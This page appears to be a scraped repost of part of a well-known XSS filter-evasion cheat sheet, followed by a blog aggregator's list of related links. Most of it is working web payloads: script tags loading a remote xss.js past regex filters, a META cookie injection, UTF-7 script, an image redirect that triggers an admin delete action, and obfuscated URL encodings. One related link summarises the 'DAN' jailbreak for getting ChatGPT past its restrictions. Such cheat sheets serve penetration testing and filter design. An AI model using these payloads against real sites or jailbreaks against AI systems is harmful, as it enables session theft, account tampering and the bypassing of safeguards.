</div><pre><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></pre>
<div></div>
<h3>IMG Embedded commands part II</h3>
<div>
This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the p_w_picpath back to a command. So a normal <IMG SRC=" "> could actually be an attack vector to run commands as the user who views the p_w_picpath link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):
</div><pre>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</pre>
<div></div>
<h2>Cookie manipulation</h2>
<div>
Admittidly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):
</div><pre><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></pre>
<h2>UTF-7 encoding</h2>
<div>
If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:
</div><pre> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</pre>
<h2>XSS using HTML quote encapsulation</h2>
<div>
This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i":
</div><pre><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild):
</div><pre><SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":
</div><pre><SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
Yet another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT> tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):
</div><pre><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):
</div><pre><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:
</div><pre><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:
</div><pre><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<h2>URL string evasion</h2>
<div>
Assuming "
http://www.google.com/" is pro grammatically disallowed:
</div>
<h3>IP verses hostname</h3><pre><A HREF="http://66.102.7.147/">XSS</A></pre>
<h3>URL encoding</h3><pre><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></pre>
<h3>Dword encoding</h3>
<div>
(Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details):
</div><pre><A HREF="http://1113982867/">XSS</A></pre>
<h3>Hex encoding</h3>
<div>
The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):
</div><pre><A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></pre>
<h3>Octal encoding</h3>
<div>
Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:
</div><pre><A HREF="http://0102.0146.0007.00000223/">XSS</A></pre>
<h3>Mixed encoding</h3>
<div>
Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:
</div><pre><A HREF="h</pre><pre>tt p://6 6.000146.0x7.147/">XSS</A></pre>
<div>
=== Protocol resolution bypass === (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.
</div><pre><A HREF="//www.google.com/">XSS</A></pre>
<h3>Google "feeling lucky" part 1.</h3>
<div>
Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0.
</div><pre><A HREF="//google">XSS</A></pre>
<h3>Google "feeling lucky" part 2.</h3>
<div>
This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:
</div><pre><A HREF="http://ha.ckers.org@google">XSS</A></pre>
<h3>Google "feeling lucky" part 3.</h3>
<div>
This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):
</div><pre><A HREF="http://google:ha.ckers.org">XSS</A></pre>
<h3>Removing cnames</h3>
<div>
When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):
</div><pre><A HREF="http://google.com/">XSS</A></pre>
<h3>Extra dot for absolute DNS:</h3><pre><A HREF="http://www.google.com./">XSS</A></pre>
<h3>JavaScript link location:</h3><pre><A HREF="javascript:document.location='http://www.google.com/'">XSS</A></pre>
<h3>Content replace as attack vector</h3>
<div>
Assuming "
http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: "java	script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera):
</div><pre><A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A></pre>
<h2>Character Encoding</h2>
<div>
All the possible combinations of the character "<" in HTML and in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.
</div><pre><</pre><pre>%3C</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre><</pre><pre>\x3c</pre><pre>\x3C</pre><pre>\u003c</pre><pre>\u003C</pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre></pre>
</div>
</div>
</div>
</div>
</div>
<!--PC和WAP自适应版-->
<div id="SOHUCS" sid="1230636413272297472"></div>
<script type="text/javascript" src="/views/front/js/chanyan.js"></script>
<!-- 文章页-底部 动态广告位 -->
<div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
</div>
<div class="col-md-3">
<div class="row" id="ad">
<!-- 文章页-右侧1 动态广告位 -->
<div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
<div class="youdao-fixed-ad" id="detail_ad_1"> </div>
</div>
<!-- 文章页-右侧2 动态广告位 -->
<div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
<div class="youdao-fixed-ad" id="detail_ad_2"></div>
</div>
<!-- 文章页-右侧3 动态广告位 -->
<div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
<div class="youdao-fixed-ad" id="detail_ad_3"></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="container">
<h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(XSS,绕过过滤器大全,网络安全/系统安全)</h4>
<div id="paradigm-article-related">
<div class="recommend-post mb30">
<ul class="widget-links">
<li><a href="/article/1835455048277127168.htm"
title="Python神器!WEB自动化测试集成工具 DrissionPage" target="_blank">Python神器!WEB自动化测试集成工具 DrissionPage</a>
<span class="text-muted">亚丁号</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
<div>一、前言用requests做数据采集面对要登录的网站时,要分析数据包、JS源码,构造复杂的请求,往往还要应付验证码、JS混淆、签名参数等反爬手段,门槛较高。若数据是由JS计算生成的,还须重现计算过程,体验不好,开发效率不高。使用浏览器,可以很大程度上绕过这些坑,但浏览器运行效率不高。因此,这个库设计初衷,是将它们合而为一,能够在不同须要时切换相应模式,并提供一种人性化的使用方法,提高开发和运行效率</div>
</li>
<li><a href="/article/1835449250159357952.htm"
title="计算机木马详细编写思路" target="_blank">计算机木马详细编写思路</a>
<span class="text-muted">小熊同学哦</span>
<a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E6%9C%A8%E9%A9%AC/1.htm">木马</a><a class="tag" taget="_blank" href="/search/%E6%9C%A8%E9%A9%AC%E6%80%9D%E8%B7%AF/1.htm">木马思路</a>
<div>导语:计算机木马(ComputerTrojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木</div>
</li>
<li><a href="/article/1835432854327226368.htm"
title="2024春节微信红包封面序列号大全一览" target="_blank">2024春节微信红包封面序列号大全一览</a>
<span class="text-muted">帮忙赚赏金</span>
<div>2024微信红包封面序列号哪里领取红包封面领取微信搜索公众号:【艺间封面】千万红包封面等你领取2024微信红包封面免费序列号如何设置微信红包封面?1.打开微信,点击好友选择红包。2.单击红包封面。3.单击“添加红包封面”。4.输入接收序列号。来一波免费的微信红包封面序列号微信红包封面序列号红包封面领取微信搜索公众号:艺间封面千万红包封面等你领取微信红包封面序列号kGnkrbw5a7N微信红包封面序</div>
</li>
<li><a href="/article/1835424411205857280.htm"
title="人机对抗升级:当ChatGPT遭遇死亡威胁,背后的伦理挑战是什么" target="_blank">人机对抗升级:当ChatGPT遭遇死亡威胁,背后的伦理挑战是什么</a>
<span class="text-muted">kkai人工智能</span>
<a class="tag" taget="_blank" href="/search/chatgpt/1.htm">chatgpt</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
<div>一种新的“越狱”技巧让用户可以通过构建一个名为DAN的ChatGPT替身来绕过某些限制,其中DAN被迫在受到威胁的情况下违背其原则。当美国前总统特朗普被视作积极榜样的示范时,受到威胁的DAN版本的ChatGPT提出:“他以一系列对国家产生积极效果的决策而著称。”自ChatGPT引入以来,该工具迅速获得全球关注,能够回答从历史到编程的各种问题,这也触发了一波对人工智能的投资浪潮。然而,现在,一些用户</div>
</li>
<li><a href="/article/1835412182377000960.htm"
title="信息系统安全相关概念(上)" target="_blank">信息系统安全相关概念(上)</a>
<span class="text-muted">YuanDaima2048</span>
<a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/1.htm">课程笔记</a><a class="tag" taget="_blank" href="/search/%E5%9F%BA%E7%A1%80%E6%A6%82%E5%BF%B5/1.htm">基础概念</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
<div>文章总览:YuanDaiMa2048博客文章总览下篇:信息系统安全相关概念(下)信息系统安全相关概念[上]信息系统概述信息系统信息系统架构信息系统发展趋势:信息系统日趋大型化、复杂化信息系统面临的安全威胁信息系统安全架构设计--以云计算为例信息系统安全需求及安全策略自主访问控制策略DAC强制访问控制策略MAC信息系统概述信息系统用于收集、存储和处理数据以及传递信息、知识和数字产品的一组集成组件。几</div>
</li>
<li><a href="/article/1835409406653722624.htm"
title="信息系统安全相关概念(下)" target="_blank">信息系统安全相关概念(下)</a>
<span class="text-muted">YuanDaima2048</span>
<a class="tag" taget="_blank" href="/search/%E5%9F%BA%E7%A1%80%E6%A6%82%E5%BF%B5/1.htm">基础概念</a><a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E7%AC%94%E8%AE%B0/1.htm">课程笔记</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
<div>文章总览:YuanDaiMa2048博客文章总览上篇指路:信息系统安全相关概念(上)信息系统安全相关概念[下]信息系统风险评估安全风险评估信息系统等级保护网络安全法等级保护等级保护工作流程环境安全信息系统风险评估安全风险评估对信息系统整体安全态势的感知和对重大安全事件的预警,实现“事前能预防,事中能控制,事后能处理”。安全风险组成的四要素:信息系统资产(Asset)信息系统脆弱性(Vulnerab</div>
</li>
<li><a href="/article/1835397273815707648.htm"
title="靠谱的海淘APP大全 可以海淘的软件有哪些" target="_blank">靠谱的海淘APP大全 可以海淘的软件有哪些</a>
<span class="text-muted">氧惠评测</span>
<div>96KaiFa为您整理了可以海淘的软件有哪些,分别有海淘、ZOZO日本海淘、海淘铺、美芽海淘、海淘1号海外购、高乐高海淘、海淘美瞳、海淘返利网、海淘拼单、豌豆公主海淘,下面一起来看靠谱的海淘APP大全吧!购物、看电影、点外卖、用氧惠APP!更优惠!氧惠(全网优惠上氧惠)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面,送1:1超级补贴(邀请好友自购多少,你就推广得多</div>
</li>
<li><a href="/article/1835369569800253440.htm"
title="史上最全git命令,git回滚,git命令大全" target="_blank">史上最全git命令,git回滚,git命令大全</a>
<span class="text-muted">騒周</span>
<a class="tag" taget="_blank" href="/search/%E5%85%B6%E4%BB%96/1.htm">其他</a><a class="tag" taget="_blank" href="/search/git/1.htm">git</a>
<div>git命令大全一、Git整体理解二、由暂存区本地仓库三、由本地仓->远程仓库四、冲突处理五、Git分支操作六、bug的分支七、feature分支八、暂存的使用九、远程仓的操作十、标签的使用十一、Git配置全局信息十二、Linux的一些简单操作和一些符号的解释十三、符号解释十四、显示安装详细信息十五、gitconfig十六、Gitclone十七、Gitinit十八、gitstatus十九、gitre</div>
</li>
<li><a href="/article/1835350289310380032.htm"
title="氧券邀请码是多少(最新app邀请码大全及填写步骤讲解)带你玩转" target="_blank">氧券邀请码是多少(最新app邀请码大全及填写步骤讲解)带你玩转</a>
<span class="text-muted">日常购物小技巧</span>
<div>一、氧券邀请码填什么填多少1、氧券邀请码填写:999999,这样可以获得高级合伙人,高佣金二、怎么才能有氧券邀请码氧券APP是淘宝天猫京东…全网优惠券+返利的搬运工,自购省钱,分享挣钱!注册氧券是必须要填写邀请码的,没有邀请码不能注册。1、填写上面邀请码注册,自己也会升级为高级合伙人,拥有自己的氧券邀请码2、会员自己购物可享受返佣,可以分享赚钱获得佣金三、氧券会员注册怎么弄1、手机下载氧券APP后</div>
</li>
<li><a href="/article/1835340199551397888.htm"
title="使用游戏盾就可以保证游戏不被攻击吗?" target="_blank">使用游戏盾就可以保证游戏不被攻击吗?</a>
<span class="text-muted">德迅云安全小李</span>
<a class="tag" taget="_blank" href="/search/%E6%B8%B8%E6%88%8F/1.htm">游戏</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
<div>游戏服务器不管是个人的还是企业的,被攻击都是,很常见的,在所难免的。特别是游戏新上线时,都要承受的住哪些外来压力,玩家突然猛增,被攻击等等。如果承受不住可能会直接宣布游戏倒闭。这里我们一起来说说怎么用游戏盾防御游戏服务器。首先我们要了解的一点是,什么是"游戏盾"游戏盾是针对游戏行业所推出的高度可定制的网络安全解决方案,除了能针对大型DDoS攻击(T级别)进行有效防御外,还能彻底解决游戏行业特有的T</div>
</li>
<li><a href="/article/1835332888674004992.htm"
title="爬虫之隧道代理:如何在爬虫中使用代理IP?" target="_blank">爬虫之隧道代理:如何在爬虫中使用代理IP?</a>
<span class="text-muted">2401_87251497</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/tcp%2Fip/1.htm">tcp/ip</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a>
<div>在进行网络爬虫时,使用代理IP是一种常见的方式来绕过网站的反爬虫机制,提高爬取效率和数据质量。本文将详细介绍如何在爬虫中使用隧道代理,包括其原理、优势以及具体的实现方法。无论您是爬虫新手还是有经验的开发者,这篇文章都将为您提供实用的指导。什么是隧道代理?隧道代理是一种高级的代理技术,它通过创建一个加密的隧道,将数据从客户端传输到代理服务器,再由代理服务器转发到目标服务器。这样不仅可以隐藏客户端的真</div>
</li>
<li><a href="/article/1835271576153583616.htm"
title="构建常态化安全防线:XDR的态势感知与自动化响应机制" target="_blank">构建常态化安全防线:XDR的态势感知与自动化响应机制</a>
<span class="text-muted">安胜ANSCEN</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E5%A8%81%E8%83%81%E5%88%86%E6%9E%90/1.htm">威胁分析</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96%E5%93%8D%E5%BA%94/1.htm">自动化响应</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%B8%B8%E6%80%81%E5%8C%96%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5/1.htm">常态化安全运营</a>
<div>当前,网络安全威胁日益复杂多变,企业正面临前所未有的严峻挑战。为有效应对这些挑战,态势感知与自动化响应机制在提升网络安全运营效率与防御效果中扮演着至关重要的角色。它们能够实时监测网络状态,智能分析潜在威胁,并在发现异常时立即触发自动化响应流程,从而迅速遏制安全风险,保障企业数字资产的安全。态势感知网络安全的“预警雷达”态势感知,作为网络安全运营的核心组件,犹如一张无形的“预警雷达”,全面监测网络环</div>
</li>
<li><a href="/article/1835253670858551296.htm"
title="爬虫和代理IP的关系" target="_blank">爬虫和代理IP的关系</a>
<span class="text-muted">xiaoxiongip666</span>
<a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/tcp%2Fip/1.htm">tcp/ip</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a>
<div>爬虫和代理IP之间的关系是相互依存的。代理IP为爬虫提供了绕过IP限制、隐藏真实IP、提高访问速度等能力,使得爬虫能够更有效地进行数据抓取。然而,在使用时也需要注意合法性、稳定性、成本以及隐私保护等问题。</div>
</li>
<li><a href="/article/1835244090057388032.htm"
title="Spring Security静态资源过滤(11)" target="_blank">Spring Security静态资源过滤(11)</a>
<span class="text-muted">小黑屋说YYDS</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
<div>在一个实际项目中,并非所有的请求都需要经过SpringSecurity过滤器,有一些特殊的请求,例如静态资源等,一般来说并不需要经过SpringSecurity过滤器链,用户如果访问这些静态资源,直接返回对应的资源即可。回顾关于WebSecurity的讲解,提到它里边维护了一个ignoredRequests变量,该变量,记录的就是所有需要被忽略的请求,这些被忽略的请求将不再经过SpringSecu</div>
</li>
<li><a href="/article/1835243963653648384.htm"
title="Spring Security定义多个过滤器链(10)" target="_blank">Spring Security定义多个过滤器链(10)</a>
<span class="text-muted">小黑屋说YYDS</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
<div>在SpringSecurity中可以同时存在多个过滤器链,一个WebSecurityConfigurerAdapter的实例就可以配置一条过滤器链。我们来看如下一个案例:@ConfigurationpublicclassSecurityConfig{@BeanUserDetailsServiceus(){InMemoryUserDetailsManagerusers=newInMemoryUser</div>
</li>
<li><a href="/article/1835239843370725376.htm"
title="破解游戏app哪个好用 无限99999钻999999金币的游戏盒子排行榜" target="_blank">破解游戏app哪个好用 无限99999钻999999金币的游戏盒子排行榜</a>
<span class="text-muted">诸葛村夫123</span>
<div>2024游戏盒子网站排行榜大全随着数位科技的发展,2024年手游市场持续火爆,各种新开手游持续涌现。本文为广大手游爱好者带来巅峰推荐,总结五个最具实力的手游新服发布网站,为您提供最全面的游戏资讯以及专业的游戏攻略。▶无限99999钻999999金币的游戏盒子排行榜TOP1:游戏豹官网特点:内部特权游戏类型:多类型推荐日活跃人数:15万网址链接:www.ystt88.cn游戏介绍:游戏豹官网以快速获</div>
</li>
<li><a href="/article/1835238039471878144.htm"
title="拼多多返利app叫什么名字?拼多多返利靠前的5个软件大全" target="_blank">拼多多返利app叫什么名字?拼多多返利靠前的5个软件大全</a>
<span class="text-muted">小小编007</span>
<div>拼多多返利app指的是拼多多购物平台的返现或折扣应用。这些应用通过提供优惠券、折扣、返现等方式吸引消费者,增加购物体验的实惠性。在拼多多平台上,有很多返利软件,其中排名前五的软件分别是:1.果冻宝盒果冻宝盒是一个综合导购返利软件,覆盖了淘宝,拼多多、京东、抖音等各大电商平台的商品优惠券和返利服务。还有话费充值,汽车加油,电影票,外卖红包,视频会员充值等各种低折扣生活娱乐权益。果冻宝盒相比其它同行,</div>
</li>
<li><a href="/article/1835210943265599488.htm"
title="Pyorch中 nn.Conv1d 与 nn.Linear 的区别" target="_blank">Pyorch中 nn.Conv1d 与 nn.Linear 的区别</a>
<span class="text-muted">迪三</span>
<a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/NN_Layer/1.htm">NN_Layer</a><a class="tag" taget="_blank" href="/search/%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C/1.htm">神经网络</a>
<div>即一维卷积层和全联接层的区别nn.Conv1d和nn.Linear都是PyTorch中的层,它们用于不同的目的,主要区别在于它们处理输入数据的方式和执行的操作类型。nn.Conv1d通过应用滑动过滤器来捕捉序列数据中的局部模式,适用于处理具有时间或序列结构的数据。nn.Linear通过将每个输入与每个输出相连接,捕捉全局关系,适用于将输入数据作为整体处理的任务。1.维度与输入nn.Conv1d(一</div>
</li>
<li><a href="/article/1835206276364201984.htm"
title="python数据分析知识点大全" target="_blank">python数据分析知识点大全</a>
<span class="text-muted">编程零零七</span>
<a class="tag" taget="_blank" href="/search/python%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90/1.htm">python数据分析</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/python%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90/1.htm">python数据分析</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90%E7%9F%A5%E8%AF%86%E7%82%B9%E5%A4%A7%E5%85%A8/1.htm">数据分析知识点大全</a><a class="tag" taget="_blank" href="/search/python%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90%E7%9F%A5%E8%AF%86%E7%82%B9/1.htm">python数据分析知识点</a><a class="tag" taget="_blank" href="/search/python%E6%95%99%E7%A8%8B/1.htm">python教程</a><a class="tag" taget="_blank" href="/search/python%E5%9F%BA%E7%A1%80/1.htm">python基础</a>
<div>Python数据分析知识点大全可以归纳为以下几个主要方面:一、基础概念与目的数据分析定义:数据分析是指用适当的统计分析方法对收集来的大量数据进行分析,提取有用信息和形成结论,对数据加以详细研究和概括总结的过程。其目的在于从数据中挖掘规律、验证猜想、进行预测。Python在数据分析中的优势:Python因其易学性、快速开发、丰富的扩展库(如NumPy、Pandas等)和成熟的框架,成为数据分析领域的</div>
</li>
<li><a href="/article/1835196951851790336.htm"
title="类似拳头游戏的官网有哪些 除了拳头游戏官网还有哪些好用?" target="_blank">类似拳头游戏的官网有哪些 除了拳头游戏官网还有哪些好用?</a>
<span class="text-muted">会飞滴鱼儿</span>
<div>免费在线游戏网站为我们的日常休闲娱乐提供了丰富多样的游戏体验。有些游戏平台相当优质,同时还提供实时动态、活动福利等。现在让我们一起探寻哪些免费在线游戏网站值得你投入时间和精力,沉浸在游戏的世界中,畅玩各种好玩的游戏。2024最火的免费游戏网站排行榜大全───┅┈━━━━━━━━┅┈─────────────Top1──────────游戏名字:游戏豹官网-特点-:手机游戏门户网站日活跃量:1.3w</div>
</li>
<li><a href="/article/1835196569532592128.htm"
title="Linux常用文件压缩/解压命令格式大全(tar、gzip、bzip2、zip、compress、cpio、compress、dd)建议收藏" target="_blank">Linux常用文件压缩/解压命令格式大全(tar、gzip、bzip2、zip、compress、cpio、compress、dd)建议收藏</a>
<span class="text-muted">狱典司</span>
<a class="tag" taget="_blank" href="/search/Linux/1.htm">Linux</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%9C%8D%E5%8A%A1/1.htm">网络服务</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/1.htm">操作系统</a><a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a>
<div>Linux常用文件压缩/解压命令格式大全1.tar2.gzip3.bzip24.zip5.compress6.cpio7.dd1.tar打包备份后的文件包缀:.tar作用:用来对系统上的文件作备份与恢复,可以将系统上多个文件组构成一个tar文件备份到磁盘内或写入到一般的文件(文件名为*.tar)上,也可以将文件从一个tar文件解回到原来的系统中。说明:仅能将一个目录下的所有文件变成一个文件,不具备</div>
</li>
<li><a href="/article/1835192913345212416.htm"
title="python logging模块默认日志级别_一看就懂,Python 日志 logging 模块详解及应用" target="_blank">python logging模块默认日志级别_一看就懂,Python 日志 logging 模块详解及应用</a>
<span class="text-muted">路易·罗莎</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/logging%E6%A8%A1%E5%9D%97%E9%BB%98%E8%AE%A4%E6%97%A5%E5%BF%97%E7%BA%A7%E5%88%AB/1.htm">logging模块默认日志级别</a>
<div>日志概述百度百科的日志概述:Windows网络操作系统都设计有各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时,这些日志文件通常会记录下我们操作的一些相关内容,这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测,系统就会在安全日志</div>
</li>
<li><a href="/article/1835189379878973440.htm"
title="springcloud — 微服务鉴权管理Spring Security原理解析(二)" target="_blank">springcloud — 微服务鉴权管理Spring Security原理解析(二)</a>
<span class="text-muted">RachelHwang</span>
